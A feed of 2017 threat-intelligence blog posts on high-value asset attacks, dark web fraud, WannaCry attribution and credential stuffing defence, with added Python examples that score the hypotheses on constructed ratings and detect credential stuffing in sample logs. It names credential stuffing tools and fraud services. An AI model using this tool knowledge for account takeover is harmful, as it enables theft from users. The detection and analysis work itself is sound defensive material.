    The table below shows a carefully chosen sample of well-documented attacks on what attackers consider to be high-value or critical assets. It is worth noting the following attacks were performed by a mixture of nation states, mercenaries, nation state proxies, cyber criminals and hacktivists, showing a complex ecosystem. We do not aim to provide definitive attribution here, merely state which are the most likely candidates based on assessments from law enforcement or the wider community.

    High Value Asset | Sector | Threat Actor | Impact on Target | Examples
    Corporate IT infrastructure | All | Cyber criminals, nation-state proxies, nation states | Availability | Ransomware attacks like WannaCry or the Sony Pictures Entertainment attack deny access to IT resources in order to extort money from the victims and/or cause embarrassment
    Corporate IT infrastructure | All | Nation states | Confidentiality | Russian-affiliated threat groups broke into a voting software company in order to use their IT infrastructure to send phishing emails to subsequent targets
    Customer (WiFi) networks | Hospitality | Nation states | Confidentiality | The Darkhotel APT group used hotel networks to target individuals of interest and deploy malware to customer machines through malicious software updates
    Cryptographic material | Technology | Cyber criminals, nation states | Confidentiality | DigiNotar’s cryptographic keys were stolen in order to forge certificates for eavesdropping on Internet users in Iran
    Database | All | Cyber criminals | Confidentiality, Integrity, Availability | The RansomWeb attack encrypted the victim’s database covertly; once the database and backups were fully encrypted, the encryption keys were removed, the database became inaccessible and ransom demands were made to the victim
    Financial transaction systems | Finance | Cyber criminals, nation states | Confidentiality, Integrity | Attackers breached various banks worldwide to send money to mule accounts via the SWIFT network infrastructure
    Financial transaction systems | Finance | Nation states | Confidentiality | Alleged Equation Group leaks detail the compromise of the SWIFT Service Bureau EastNets to extract transaction information from their database
    Industrial process design and development | Manufacturing, Aerospace, Defence | Freelancers | Confidentiality | Su Bin stole component design blueprints and flight test data for sale to competing companies
    Network infrastructure | Broadcasting | Nation states | Availability | TV5Monde’s routers and switches were corrupted by malicious firmware updates, which caused the TV station to cease broadcasting
    Non-public information | All | Nation states | Confidentiality | Hackers allegedly from PLA Unit 61398 stole “thousands of e-mails and related attachments that provided detailed information about SolarWorld’s financial position, production capabilities, cost structure, and business strategy”
    Non-public information | Finance, Legal | Cyber criminals | Confidentiality | Hackers stole non-public press releases about upcoming announcements by public companies concerning earnings, gross margins, revenues, etc. and used this information to conduct trades
    Source code | Technology | Freelancers, nation states | Confidentiality | Attackers compromised Yahoo in order to find the source code so they could forge cookies to gain persistent, unauthorized access to user accounts
    Payment card information | Retail | Cyber criminals | Confidentiality | Attackers stole 40 million records of payment card information from Target’s Point of Sale (PoS) systems by breaking into a supplier who had access to the Target network
    PHI/PII | Healthcare | Cyber criminals | Confidentiality | 80 million customer records were stolen from Anthem; this data may be used for espionage and/or financial crime such as filing fraudulent tax returns and issuing pre-paid debit cards
    SCADA systems | Energy | Nation states | Availability | A cyber-attack was performed against a Ukrainian power company’s circuit breakers, causing the loss of power to approximately 225,000 customers
    Social media accounts | All | Cyber criminals | Availability | Wired reporter Mat Honan had his various cloud service accounts breached and his devices remotely wiped in order to take over his social media account
    Social media accounts | All | Nation state proxy | Integrity | The Syrian Electronic Army hijacked the social media accounts of various global companies in order to spread propaganda

    A common theme running through the above table is how attackers take the path of least resistance to their goals and in the cases where critical assets were not reachable, used a creative approach to monetize the access that they did have.

    Some common themes concerning attacker goals emerge:

    • Attacks are a multi-stage process; each stage helps the attackers get closer to their goal. An organization may be compromised for its own assets or because its assets help an attacker reach its target. Financially-motivated cyber criminal actors seek out not only directly monetizable assets like payment card information but also assets which can be sold, such as PHI/PII or non-public information.
    • Sectors such as finance and defense are well-known targets for attackers, but following on from the multi-stage theme above, other organizations may find themselves as targets as they are on the “flight path” from the attacker to the intended target, for example, in the case of supply chain compromise.
    • While theft is very common (confidentiality violations), attacks on availability, such as extortion via ransomware, and attacks on integrity, such as source code manipulation, do also occur. Attackers have a diverse set of actions in their portfolio and may use any of them against a particular target.

    By understanding the goals of the attackers, defenders can understand which of their assets need to be safeguarded. Any breach investigation or incident response should attempt, where possible, to understand the goals of the attackers in order to gain insight on how attackers are targeting an organization’s assets.

    Recent attacks like the Nyetya outbreak highlight the difficulty of being certain about attacker goals, as there may be deliberate attempts by the attacker to obscure their true goals; in such cases the different plausible attacker goals must all be considered.

    We recently wrote a blog on five ways security engineering can help to protect these assets.

    Threats From the Dark Web Mon, 26 Jun 2017 16:22:44 +0000 Despite the hype associated with the dark web, maintaining visibility into it is an important component of a comprehensive digital risk management program. In support of our announcement today about the expansion of our SearchLight’s dark web collection capabilities, we wanted to highlight some of the digital risks that can be associated with the dark web in this blog. It is important to note that these risks can also occur on the open and deep web, just as with our previous research on sites like

    Dark Web Risks

    Criminals are stealing customer data through payment systems and they are talking about it on the dark web

    The insecurity of payment systems makes the news frequently. Take the recent Chipotle breach, which resulted from malware on their Point of Sale devices. It’s important for retailers (and any organizations with ATMs or PoS devices) to ensure these devices and their transactions are secure. Having visibility into criminal forum conversations that discuss committing fraud against these devices, third parties or your company is critically important. It is also important to have visibility into the items for sale in criminal marketplaces that could be used to conduct fraud. This can take many forms; it might be a guide for ATM skimmers (Figure 1), or product listings for specific hardware. Having visibility into these dark web conversations can make the difference in stopping or mitigating a breach.


    Figure 1: Dark Web Marketplace offering guides on how to make ATM skimmers

    Criminals are selling customer account details on the dark web

    For banks seeking to protect their customers, gaining visibility and monitoring the dark web can be a highly valuable tool to stop fraud. Adversaries share credit card numbers on IRC channels (Figure 2) and sell accounts on dark web forums (Figure 3). Detecting these activities gives banks better visibility into their customers’ online exposure and enables them to get on the offense to minimize the impact.


    Figure 2: IRC channel sharing and testing customer credit card information


    Figure 3: Accounts for sale on the dark web

    Criminals are taking over employees and customers’ accounts

    It isn’t always a company’s assets that are at risk; organizations can also gain awareness of tools used against them. Figure 4 is an example of a tactic used to bypass SMS account verification. Understanding the latest tactics used by adversaries is vital for an organization’s security decision-making and for reducing its risk profile.


    Figure 4: New tool for bypassing SMS authentication offered, mentioning specific sites

    Criminals are conducting tax return fraud

    Tax milestones throughout the year are popular times for fraud, and tax information is in high demand among cybercriminals. Approaching the deadline for 2017’s tax returns, we detected a user claiming to sell access to the PCs of individuals working for accounting companies. The accompanying screenshots indicated that the user had access to information on hundreds of companies in the United States.


    Figure 5: User selling access to an accounting company’s customer information, consisting of sensitive tax information

    Digital Shadows provides the context you need to manage dark web threats

    It isn’t enough to simply detect mentions of company assets and concerns across the dark web. Organizations need context behind these posts to have a better understanding. As a result, today we announced an expansion of our SearchLight’s dark web collection capabilities where we help our customers manage their dark web threats in five ways:

    1. Detailed Explorer view. View the post in Searchlight’s explorer view to see previous posts by other users on the same thread or post. This enhanced view provides organizations with added context, enabling them to better understand how their company, employees or customers are likely to be impacted.
    2. Dark Web User Background. The incident also provides an overview of the user in question, with their username, date joined, activity levels and reputation. This enables you to understand the credibility of the dark web user, informing your response.
    3. Incident view with context. The incident includes a description, impact and recommendation action, all of which are written up by our team of expert analysts. This helps you to make a more informed decision about the risk to your business.
    4. Detailed Source Background. Pivot from the incident into the intelligence view, providing context on the forum or marketplace. This context includes a description, timeline of events, associations, intelligence, and associated sites and social media accounts.

    The importance of our team of data analysts extends beyond adding vital and relevant context. Not all dark or deep web sites can be easily accessed with technology on its own; expert human data analysts must also gain access to closed sources to provide the most relevant view of digital risks. Digital Shadows recognizes it is critical to complement automation with a team of data scientists and intelligence experts who gain access to closed sources and qualify the data collected to enhance analytic capabilities. This gives our customers the full breadth and context needed to address the digital risks that are most relevant and impactful to their business.

    Figure 6: SearchLight’s incident view, complete with vital context

    Armed with this vital context, organizations are better informed about the risks they face online across the open, deep and dark web, understanding not only when they are mentioned online, but also why, by whom and the likely impact to their organization.

    To learn more about Digital Shadows Searchlight™ dark web monitoring capability, watch this demo video or read our datasheet for more details.

    WannaCry: An Analysis of Competing Hypotheses – Part II Wed, 07 Jun 2017 16:30:52 +0000 Following the furore of last month’s WannaCry ransomware attacks, Digital Shadows produced an Analysis of Competing Hypotheses (ACH) table to make some initial assessments on the type of actor most likely to have been responsible for the campaign. First and foremost, the ACH method was chosen as it allows us to assess the reliability and relevance of the data available on open sources. As with most investigations, new evidence may emerge over time prompting us to re-examine previous assumptions and theories.

    In the case of WannaCry, several, potentially significant, data points have come to light in recent weeks, including:

    • The code similarities found between WannaCry samples from February 2017 and those previously used by the Lazarus Group have been further corroborated by other sources within the security community. We have, therefore, raised the Credibility of this data point to medium and the Relevance to high. Likewise, for reported malware similarities between WannaCry and other North Korean operations, we have also raised the Credibility of this data point to medium.
    • According to Sophos and Nominum Inc., the first evidence for WannaCry was found when a client from an ISP in Southeast Asia hit WannaCry’s “kill-switch” domain. While this type of evidence is not definitive, our own analysis of Google trending data indicated that users in Taiwan were one of the first to begin searching for WannaCry. The graph below, taken from Google API data, plots the normalized number of Google searches for the term “wana decryptor 2.0” (the term that appeared on the ransom note) by time and by country. Here we see that users in Taiwan began searching for the term “wana decryptor 2.0” at about 6am BST (1pm Taiwan time). As this graph relies on Google API data, Chinese searches were not included; nevertheless, there is a strong indication that south-east Asia was the first region to be affected by the ransomware.


    Figure 1: Google searches for “wanna decryptor 2.0” by country (Please note that the y-axis does not represent the number of Google searches, but is instead a normalized number signifying the percentage of searches in that country for a specific term (in this case “wana decryptor 2.0”) in relation to all other Google searches.)

    • Language analysis of the various WannaCry ransom messages has indicated that 26 of the 28 messages were machine-translated from English. The Chinese-language version, however, appeared to have been written by a native speaker, and contained a typo that would have been highly unlikely to result from machine translation.

    As before, we considered four hypotheses for this exercise. That the campaign was the work of:

    • A sophisticated financially-motivated cybercriminal actor – H1
    • An unsophisticated financially-motivated cybercriminal actor – H2
    • A nation state or state-affiliated actor conducting a disruptive operation – H3
    • A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Once we add the new and amended data points, the table looks as follows:


    Figure 1 – ACH diagram

    While the above points do not drastically change the outcome of our initial ACH table, the inconsistency score between H2 (an unsophisticated cybercriminal actor) and H4 (a nation-state or state-affiliated actor looking to discredit the NSA) does narrow. With so little between them, the margin of error is such that both scenarios were equally plausible. We therefore assessed that, based on the information available at the time of writing, the WannaCry campaign was most likely launched by either:

    a) An unsophisticated financially-motivated cybercriminal actor – H2

    b) A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4
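    The ACH mechanics the post relies on (rating each data point against each hypothesis, weighting by Credibility and Relevance, and then re-scoring when a data point is upgraded, as was done for the Lazarus code overlap) are easy to make explicit in code. What follows is an added example, not Digital Shadows’ tooling or the contents of their table: the evidence descriptions echo the post’s data points, but every credibility, relevance and per-hypothesis rating is a hypothetical value chosen for illustration, since the post’s own matrix is only reproduced as an image. The scoring follows the usual ACH convention that only inconsistencies count, so the lowest score is the hypothesis the evidence refutes least.

```python
from copy import deepcopy

HYPOTHESES = ["H1", "H2", "H3", "H4"]          # same labels as the post
WEIGHT = {"low": 1, "medium": 2, "high": 3}    # hypothetical numeric scale for credibility and relevance
INCONSISTENT = {"I": 1, "II": 2}               # "I" inconsistent, "II" strongly inconsistent (counts double here)

# Constructed evidence matrix. The descriptions echo the post's data points, but the
# credibility, relevance and per-hypothesis ratings ("C" consistent, "I"/"II" inconsistent,
# "N" neutral) are hypothetical values for illustration, not the post's own cell values.
EVIDENCE = [
    {"id": "E1", "desc": "Code overlap with earlier Lazarus Group samples",
     "cred": "low", "rel": "high",
     "ratings": {"H1": "I", "H2": "II", "H3": "C", "H4": "C"}},
    {"id": "E2", "desc": "Worm propagation using a leaked exploit",
     "cred": "high", "rel": "low",
     "ratings": {"H1": "C", "H2": "C", "H3": "C", "H4": "C"}},
    {"id": "E3", "desc": "Earliest infections seen in Southeast Asia",
     "cred": "low", "rel": "medium",
     "ratings": {"H1": "N", "H2": "N", "H3": "C", "H4": "C"}},
    {"id": "E4", "desc": "Ransom notes machine-translated except a native Chinese version",
     "cred": "medium", "rel": "medium",
     "ratings": {"H1": "I", "H2": "N", "H3": "N", "H4": "N"}},
]


def evidence_weight(item):
    """How much an inconsistency with this item costs a hypothesis."""
    return WEIGHT[item["cred"]] * WEIGHT[item["rel"]]


def inconsistency_scores(evidence, hypotheses=HYPOTHESES):
    """Weighted inconsistency score per hypothesis; lower means more plausible.
    Consistent ("C") and neutral ("N") cells add nothing: ACH seeks to refute, not confirm."""
    scores = {h: 0 for h in hypotheses}
    for item in evidence:
        w = evidence_weight(item)
        for h in hypotheses:
            scores[h] += INCONSISTENT.get(item["ratings"][h], 0) * w
    return scores


def rank(scores):
    """Hypotheses ordered from least to most inconsistent (ties broken by label)."""
    return sorted(scores.items(), key=lambda kv: (kv[1], kv[0]))


def diagnostic_items(evidence, hypotheses=HYPOTHESES):
    """Items that refute some hypotheses but not all. An item consistent with every
    hypothesis (E2 above) carries no diagnostic value however credible it is."""
    out = []
    for item in evidence:
        refuted = [h for h in hypotheses if item["ratings"][h] in INCONSISTENT]
        if 0 < len(refuted) < len(hypotheses):
            out.append(item["id"])
    return out


def rescore_with(evidence, item_id, cred=None, rel=None, hypotheses=HYPOTHESES):
    """Re-run the scoring after revising one item's credibility and/or relevance,
    the step the post performs when new reporting corroborates a data point."""
    revised = deepcopy(evidence)
    for item in revised:
        if item["id"] == item_id:
            item["cred"] = cred or item["cred"]
            item["rel"] = rel or item["rel"]
    return inconsistency_scores(revised, hypotheses)


if __name__ == "__main__":
    before = inconsistency_scores(EVIDENCE)
    after = rescore_with(EVIDENCE, "E1", cred="medium")
    print("diagnostic items:", diagnostic_items(EVIDENCE))
    print("before:", rank(before))
    print("after raising E1 credibility:", rank(after))
```

    Two properties of the method show up directly in the numbers: raising the credibility of a single diagnostic item (E1 here) reorders the hypotheses it refutes without touching those it is consistent with, and a highly credible item that fits every hypothesis equally (E2) never moves the scores at all. That second point is why the post’s emphasis on Relevance alongside Credibility matters.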

    Alternative hypotheses?

    As rightly mentioned by Pasquale Stirparo in a recent SANS blog referencing Digital Shadows, the ACH technique encourages collaborative discussion and alternative viewpoints. Our original aim in creating this ACH was to provide a structured analysis of the general type of threat actor responsible for WannaCry and – perhaps more significantly – this actor’s potential motivation. Our four original hypotheses were, therefore, fairly broad, and we have avoided focusing on specific threat actors given the inherent difficulty in providing attribution. Pasquale built upon our original ACH table by adding new data points and three alternative hypotheses, and we hope others will attempt their own analyses and further highlight the usefulness of this technique. While Pasquale chose to break out H4 into separate hypotheses for a (1) nation-state actor aiming to discredit the NSA and a (2) generic threat actor with the same motivation, we have decided to uphold our original four hypotheses given the overlapping objectives of these actors.[1]

    The death of Lazarus?

    The Lazarus Group remains one of the most difficult to incorporate into our ACH analysis, for several reasons. Firstly, there is still no clear, confirmed explanation for who this group is and how it operates. We have previously assessed it to be highly likely that the group has some affiliation with the North Korean state (DPRK), due to a significant proportion of the group’s activities being aligned with North Korean interests. While Lazarus’ pre-2016 activity mainly consisted of espionage-focused and disruptive operations, their more recent operations, such as the reported attacks on SWIFT banking networks, appear to be financially-motivated and more akin to the actions of an organized criminal group. There are, therefore, many unanswered questions: is Lazarus a standing unit of the DPRK’s intelligence services? If not, are they an organized criminal group? Lazarus command and control infrastructure has, at different points, been identified on both North Korean and Chinese ISPs – so where are they based? As we have yet to detect any conclusive evidence directly linking the group’s more recent financially motivated activity to the DPRK, we have developed alternative hypotheses for the nature of the Lazarus Group:

    1. The Lazarus Group is an organized crime group (OCG) based outside of the DPRK but with connections to the DPRK state via a relationship with foreign service elements of the Korean People’s Army (KPA). The group is tasked to perform operations on behalf of the DPRK by a case officer, but also operates for private profit.
    2. The Lazarus Group is a KPA unit, but does not always operate based on direct taskings and sometimes its operators conduct financially motivated operations. The unit is based outside the DPRK, which facilitates this activity.
    3. The Lazarus Group is not a single entity. Multiple individuals or groups have gained access to technical assets developed by the Lazarus Group through intentional or unintentional leaks, thefts or through sales.

    The nebulous nature of Lazarus creates obvious difficulties for our ACH analysis. Do we consider them a nation-state actor (therefore falling under H3 and H4), or an organized criminal group who at times work on behalf of state actors (H1)? Without having a clear understanding of what type of threat actor Lazarus is, it becomes very difficult to incorporate it into an ACH analysis designed to tackle our original question: what type of actor is most likely to have been behind the WannaCry attacks?

    This is not to say that we are discounting the Lazarus Group. Far from it. The group could easily be considered as an example of three of our four original hypotheses (H1, H3 and H4). With H4 being one of our two most plausible scenarios, the case for Lazarus has certainly not gone cold. The new data points we have added – specifically that users in south-east Asia were reportedly among WannaCry’s first victims and the original ransom note was written by a native Chinese speaker – also point towards an East Asian nexus, which may or may not be significant for those considering a Lazarus Group attribution.

    This approach encourages collaboration within the community and enables us to think critically about evidence. By incorporating ACHs into their analysis, threat intelligence teams can make sense of the various pieces of evidence and better understand the likely motivations of adversaries.


    [1] We would also like to thank Pasquale for highlighting a formatting error in our original blog post that led to a small discrepancy in the inconsistency weighting score for H2.

    7 Tips for Protecting Against Account Takeovers Mon, 22 May 2017 19:16:16 +0000 In May 2017, an amalgamation of over 1 billion credentials was uploaded to the Have I Been Pwned database. One of the lists has been dubbed “Anti-Public”, and contained 457,962,538 unique email addresses. This list has reportedly previously been widely circulated and used for credential stuffing attacks, whereby attackers seek to identify instances of password reuse in order to compromise further accounts. (“Anti-Public” is also the name of a credential stuffing tool used to verify the legitimacy of compromised credentials).

    What is Credential Stuffing?

    Credential stuffing is a type of brute force attack whereby large sets of credentials are automatically inserted into login pages until a match with an existing account is found. Our latest whitepaper looks at what credential stuffing is and what tools are being used for it. Later in this blog, I will outline seven tips you can take to protect against account takeover.

    There are billions of leaked credentials exposed online, so chances are that many of these have reused usernames and passwords. These are valuable to cybercriminals, who are increasingly turning to credential stuffing tools to automate attempts at account takeover. By looking at the site sentry[.]mba, it’s possible to get an idea of the most targeted organizations and sectors. Common targets for these attacks are the gaming, technology, broadcasting and retail sectors (see below).


    Figure 1: The most prevalent sectors, based on the number of configuration files shared (green) and downloaded (purple) for organizations

    There are many credential stuffing tools available to cybercriminals but three stand out: SentryMBA, Vertex and Hitman. Our paper takes a look at how easy it is for cybercriminals to execute account takeovers. To protect yourself against account takeover, implement the following:

    1.  Monitor for leaked credentials of your employees. Troy Hunt’s Have I Been Pwned is a great resource for this, alerting you to instances of breaches including your organization’s email domain.

    2.  Monitor for mentions of your company and brand names across cracking forums. This can help to direct your security investment. Use Google Alerts for this (Johnny Long offers some great tips for doing so), as they can provide a good identification of the specific risks to your business. Configuration files for your website that are being actively shared and downloaded are probably a good indication of impending attempts at account takeover.

    3.  Monitor for leaked credentials of your customers, allowing you to take a more proactive response. Consider alerting your customers that their email has been involved in a breach, prompting them to reset their password if they have reused credentials.

    4.  Deploy an inline Web Application Firewall. Commercial and open source web application firewalls, like ModSecurity, can be used to identify and block credential stuffing attacks.

    5.  Increase user awareness. Educate your staff and consumers about the dangers of using corporate email addresses for personal accounts, as well as reusing passwords.

    6.  Gain an awareness of credential stuffing tools. Keep an eye on the development of credential stuffing tools, and monitor how your security solutions can protect against evolving capabilities. Some credential stuffing tools are able to bypass some CAPTCHAs, for example.

    7.  Implement multi-factor authentication that doesn’t leverage SMS. This can help to reduce account takeovers, but make sure this is balanced against the friction (and cost) it can cause.
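    The inline WAF in tip 4 blocks what it can recognise, and the usual tell of a credential stuffing run is one source walking through many different usernames in a short window, rather than one user retrying one account. The following detector, an added example written for this post and not part of any Digital Shadows tooling, runs that check over a few constructed login log lines (the IPs, usernames and log format are invented for the illustration) and also lists the accounts a flagged source actually got into, which are the ones tip 3 would have you reset proactively:

```python
"""Credential-stuffing detector run over constructed web-server login log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real traffic): timestamp, client IP, username, outcome.
# 203.0.113.7 walks a combo list; 198.51.100.4 is one user mistyping a password.
SAMPLE_LOG = """\
2017-05-22T10:00:01Z 203.0.113.7 login user=alice result=fail
2017-05-22T10:00:02Z 203.0.113.7 login user=bob result=fail
2017-05-22T10:00:02Z 203.0.113.7 login user=carol result=fail
2017-05-22T10:00:03Z 203.0.113.7 login user=dave result=fail
2017-05-22T10:00:03Z 203.0.113.7 login user=erin result=success
2017-05-22T10:00:04Z 203.0.113.7 login user=frank result=fail
2017-05-22T10:00:05Z 198.51.100.4 login user=alice result=fail
2017-05-22T10:00:09Z 198.51.100.4 login user=alice result=fail
2017-05-22T10:00:15Z 198.51.100.4 login user=alice result=success
"""

# Assumed line layout for the constructed log; adapt the pattern to your own access log.
LINE_RE = re.compile(r"^(\S+) (\S+) login user=(\S+) result=(fail|success)$")


def parse(log_text):
    """Yield (timestamp, ip, username, result) for every login event in the log."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a login event; ignore
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m.group(2), m.group(3), m.group(4)


def detect_stuffing(events, window=timedelta(seconds=60), min_attempts=5, min_users=4):
    """Flag source IPs that attempt many *distinct* usernames within one time window.

    A legitimate user who mistypes a password retries the same username; a stuffing
    tool iterates a leaked combo list, so the distinct-username count is the signal.
    Successful logins are counted too, since the hits are what the attacker is after.
    """
    recent = defaultdict(deque)  # ip -> sliding window of (timestamp, username)
    alerts = {}
    for ts, ip, user, _result in sorted(events):
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:  # expire events outside the window
            q.popleft()
        users = {u for _, u in q}
        if len(q) >= min_attempts and len(users) >= min_users:
            alerts[ip] = {"attempts": len(q), "distinct_users": len(users), "last_seen": ts}
    return alerts


def compromised_accounts(events, alerts):
    """Accounts a flagged source logged into successfully: candidates for a forced password reset."""
    return sorted({user for _ts, ip, user, result in events
                   if ip in alerts and result == "success"})


if __name__ == "__main__":
    events = list(parse(SAMPLE_LOG))
    found = detect_stuffing(events)
    for ip, info in found.items():
        print(f"{ip}: {info['attempts']} attempts across {info['distinct_users']} usernames")
    print("reset these accounts:", compromised_accounts(events, found))
```

    The thresholds are deliberately conservative; in practice you would tune the window and counts to your own baseline, and combine this per-source rule with a global failed-login rate, since tools that spread a list across many proxies will stay under any single-IP threshold.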

    WannaCry: An Analysis of Competing Hypotheses Thu, 18 May 2017 17:35:21 +0000 On 12 May 2017, as the WannaCry ransomware spread across computer networks across the world, a variety of explanations also began to worm their way through the information security community. Who was responsible for the WannaCry campaign? And what was the objective? Ransomware suggested it was the work of cybercriminals, although, given the sheer scale of infections and disruption, some commentators suspected the hand of a nation state. Despite relentless analysis from the security research community that has brought fragments of new information to the fore, no consensus has yet been reached on an attribution for the campaign.

    One of the most recent theories put forward rests on a possible connection between WannaCry and the Lazarus Group, an actor that has previously been linked with several high-profile network intrusions and assessed as highly likely to have some association with the Democratic People’s Republic of Korea (DPRK). Analysis has indicated that WannaCry samples from February 2017 contained a small section of code identical to those used in previous Lazarus campaigns. At the time of writing, however, we assessed there to be insufficient evidence to corroborate this claim of attribution to this group, and alternative hypotheses should be considered. While malware may initially be developed and used by a single actor, this does not mean that it will permanently remain unique to that actor. Malware samples might be accidentally or intentionally leaked, stolen, sold, or used in independent operations by individual members of a group. It is therefore important to consider other factors, such as the consistency of an operation with previous activity attributed to an actor.

    Digital Shadows has, therefore, applied the Analysis of Competing Hypotheses (ACH) technique to the information currently available through sources. ACH uses a weighted inconsistency algorithm to assign numeric values – weighted by the assessed reliability and relevance of each data point – to represent how consistent the available evidence is with a given hypothesis. While the aim here was not to provide a conclusive attribution for the WannaCry campaign, this structured analytical technique allows us to assess the reliability and relevance of the data presented thus far, as well as make some tentative assessments over the type of actor most likely to have been behind last week’s attacks. As such, we compared four hypotheses for the purposes of this exercise. That the campaign was the work of:

    • A sophisticated financially-motivated cybercriminal actor – H1
    • An unsophisticated financially-motivated cybercriminal actor – H2
    • A nation state or state-affiliated actor conducting a disruptive operation – H3
    • A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Using a mixture of primary and secondary reporting, as well as assessments from Digital Shadows analysts, we have included a collection of the most salient data points to have emerged at the time of writing. As well as the widely-discussed use of the DOUBLEPULSAR backdoor dropper, ETERNALBLUE exploit, and SMB vulnerability, the latter for propagation, we have included several other pieces of evidence to drive our assessment. These are presented in the ACH table below, though some of the more significant points include:

    • So-called “kill-switch” probably an anti-sandboxing feature – MalwareTech, who discovered the unregistered domain, now believes this was most likely included as a badly thought-out anti-analysis measure.
    • Low number of Bitcoin wallets a result of an unintentional bug – Symantec have reported that the creation of only three Bitcoin wallets for victims to transfer payment into was the result of a bug in the malware’s code, referred to as a race condition.
    • No evidence that the malware was delivered via phishing emails – IBM X-Force, for example, scanned over one billion emails passing through its honeypots and found no evidence suggesting spam/phishing was the initial infection vector.
    • Unconfirmed links to Lazarus Group and North Korean campaigns – Some researchers have now claimed that WannaCry contained pieces of code previously associated with the Lazarus Group, as well as two malware variants (called Joanap and Brambul) used in attacks against South Korean organizations. This connection, however, was assessed to be primarily based on the ordering of ciphers and public libraries used by the Lazarus Group, and inconclusive at the time of writing.
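    To make the weighted inconsistency scoring concrete, here is an added worked example (written for this post; it is not the ACH tooling Digital Shadows used, and the C/I/N ratings below are illustrative choices, not the post’s actual table). It assumes a common ACH weighting scheme: only “Inconsistent” and “Very Inconsistent” ratings count against a hypothesis, each multiplied by the evidence’s reliability times relevance, with low/medium/high mapped to 1/2/3. The lowest score is the most plausible hypothesis, and the helper at the end lists which evidence items weigh most against a given hypothesis, which is what a reviewer such as Pasquale would want to challenge first.

```python
"""Weighted inconsistency scoring for an Analysis of Competing Hypotheses (ACH) matrix."""
from dataclasses import dataclass

CC, C, N, I, II = "CC", "C", "N", "I", "II"           # analyst ratings per cell
# Assumed scheme: consistent/neutral cells add nothing; II counts double.
INCONSISTENCY_FACTOR = {CC: 0.0, C: 0.0, N: 0.0, I: 1.0, II: 2.0}
LEVEL = {"low": 1.0, "medium": 2.0, "high": 3.0}       # assumed mapping for the labels

HYPOTHESES = ["H1", "H2", "H3", "H4"]                  # as defined in the post above


@dataclass
class Evidence:
    description: str
    reliability: str          # "low" | "medium" | "high"
    relevance: str            # "low" | "medium" | "high"
    ratings: dict             # hypothesis id -> rating; a missing entry counts as N

    def weight(self) -> float:
        return LEVEL[self.reliability] * LEVEL[self.relevance]


def score(hypotheses, evidence):
    """Weighted inconsistency score per hypothesis; lower means more consistent with the evidence."""
    scores = {h: 0.0 for h in hypotheses}
    for e in evidence:
        w = e.weight()
        for h in hypotheses:
            scores[h] += w * INCONSISTENCY_FACTOR[e.ratings.get(h, N)]
    return scores


def rank(scores):
    """Most plausible first; ties broken by hypothesis id so output is deterministic."""
    return sorted(scores, key=lambda h: (scores[h], h))


def top_inconsistencies(evidence, hypothesis, limit=3):
    """Evidence items that count most against one hypothesis, strongest first."""
    contributions = [(e.weight() * INCONSISTENCY_FACTOR[e.ratings.get(hypothesis, N)], e.description)
                     for e in evidence]
    return [desc for c, desc in sorted(contributions, reverse=True) if c > 0][:limit]


# Constructed ratings for the data points discussed in the post (illustrative, not the post's table).
WANNACRY_EVIDENCE = [
    Evidence("Kill-switch domain probably a botched anti-sandboxing feature", "medium", "high",
             {"H1": I, "H2": C, "H3": I, "H4": N}),
    Evidence("Only three Bitcoin wallets, caused by a race-condition bug", "high", "high",
             {"H1": II, "H2": CC, "H3": N, "H4": N}),
    Evidence("No evidence of a phishing/spam delivery vector", "medium", "medium",
             {"H1": I, "H2": C, "H3": I, "H4": N}),
    Evidence("Code overlap with earlier Lazarus Group samples", "low", "medium",
             {"H1": N, "H2": I, "H3": C, "H4": C}),
    Evidence("No media narrative discrediting the NSA accompanied the attack", "medium", "medium",
             {"H1": N, "H2": N, "H3": N, "H4": I}),
    Evidence("Indiscriminate global spread with no operator control", "high", "high",
             {"H1": I, "H2": C, "H3": II, "H4": I}),
]


def wannacry_illustration():
    """Score and rank the four hypotheses against the constructed evidence set."""
    scores = score(HYPOTHESES, WANNACRY_EVIDENCE)
    return scores, rank(scores)


if __name__ == "__main__":
    scores, ordering = wannacry_illustration()
    for h in ordering:
        print(f"{h}: inconsistency {scores[h]:.0f}")
    print("strongest points against H1:", top_inconsistencies(WANNACRY_EVIDENCE, "H1"))
```

    With these constructed ratings the ordering comes out H2, H4, H3, H1, mirroring the post’s conclusion that H2 and H4 are the two most plausible; changing a single high-weight rating (say, promoting the Lazarus code overlap to high reliability) is the quickest way to see how sensitive that ordering is, which is exactly the collaborative discussion the technique is meant to prompt.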

    ACH reveals the most plausible scenario is that an unsophisticated cybercriminal actor launched the WannaCry campaign


    Figure 1 – ACH diagram

    Though by no means definitive, we assessed that a WannaCry campaign launched by an unsophisticated cybercriminal actor was the most plausible scenario based on the information that is currently available. While there were numerous data points that were consistent with this assessment, a few stand out:

    • Coordination and implementation of the campaign was relatively poor: victims who paid reportedly did not receive decryption keys
    • No discernible pattern to the organizations that were targeted
    • Only three Bitcoin wallets were created for the receipt of payment
    • An inability to monetize effectively
    • Failed anti-sandboxing measure and race condition bug

    These inconsistencies are not errors we normally associate with a sophisticated cybercriminal operation. The Carbanak (AKA Anunak) organized criminal group, in comparison, are known for conducting highly-targeted, lucrative, and efficient operations relying on the strategic use of social engineering attacks and network intrusions that more resemble the tactics used by Advanced Persistent Threat (APT) groups.

    H3 and H4, which posit that the campaign was the work of a state-affiliated actor, also contain inconsistencies:

    • If the attacks were aimed to discredit the NSA (H4), then why the lack of a supporting media narrative driving this message home? In the 2016 attacks on the US Presidential election, for example, network intrusions against the Democratic Party and subsequent data leaks were accompanied by blog posts and media commentary critical of Hillary Clinton. Were this to be a nation state campaign intended to cause disruption (H3), we would also expect to see some level of target specification alongside clear campaign objectives.
    • During their previous destructive campaigns, the Lazarus Group, for example, have generally displayed a consistent level of geographic targeting – primarily against organizations in South Korea and the US. Specific industries such as media companies, financial institutions and critical national infrastructure have been the main targets of attack, but in the case of WannaCry, infections were widely distributed across the world, and the malware appeared to spread virtually indiscriminately with no control by its operators. Had the attackers used a phishing vector, they would have been able to limit the malware’s capability to spread outside a network and instead used spear phishing emails to target selected organizations.

    Such tactics would have been more consistent with the activities of a sophisticated criminal outfit or a technically-competent nation-state actor.

